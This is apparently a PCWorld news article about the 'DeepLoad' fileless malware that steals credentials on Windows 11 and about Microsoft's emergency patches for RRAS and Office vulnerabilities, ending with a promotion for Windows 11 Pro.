Windows 11’s security situation continues to deteriorate. Users and businesses, especially the latter, are facing two risky developments: first, a new AI-powered malware threat, and second, additional emergency updates from Microsoft fixing critical security vulnerabilities.
This combination highlights just how rapidly the threat landscape in the Windows environment is changing these days.
At the center is a new piece of malware called “DeepLoad,” which differs from conventional malware: instead of delivering suspicious files to the computer, it relies on a so-called “fileless” attack method.
Specifically, users are tricked into entering seemingly harmless commands into Command Prompt or PowerShell. It’s through this action that the infection is actually triggered—and traditional antivirus scanners, which primarily react to known files, often fail to detect it.
Once the system has been compromised, malware can establish a permanent foothold and communicate with the attackers’ servers via legitimate Windows tools. The primary goal is to steal login credentials, particularly in corporate environments.
For you as a user, this means one thing above all: traditional protection mechanisms are increasingly reaching their limits. AI-powered malware can dynamically adapt its code, making it significantly harder to detect.
At the same time, the time between a security vulnerability being discovered and the first attacks is shrinking.
For home users, the risk is currently lower than in corporate environments. Nevertheless, even everyday attacks are increasingly relying on deception rather than technology.
Even though many current attacks specifically target businesses, there are some basic measures you can start taking right now:
In parallel, Microsoft already released emergency security updates in mid-March. These primarily affect Windows 11 Enterprise versions such as 24H2 and 25H2, as well as the LTSC variant.
Several critical vulnerabilities in Routing and Remote Access Service (RRAS) have been patched. Attackers could exploit these flaws to execute malicious code remotely and take complete control of a system. In some scenarios, simply connecting to a compromised server was enough for an attack to succeed.
The current issues are part of a wider trend. On Patch Tuesday in March, Microsoft patched more than 80 vulnerabilities, including critical flaws in Excel and other Office applications. In some cases, simply opening the preview pane in Outlook was enough to execute malicious code.
Furthermore, initial examples show that AI features such as Copilot can also create new attack vectors—for instance, when data is inadvertently passed on via automated processes.
By the way: If you’re using Windows 11 Home, you’re missing out on the many benefits of Windows 11 Pro. To learn more, see our comparison of Windows 11 Home and Pro. If you want to upgrade, snag it for cheap in the PCWorld Software Store: now just $59 instead of $99.
Author: Viviane Osswald
Source: PCWorld
Reviewed By: Editorial Team
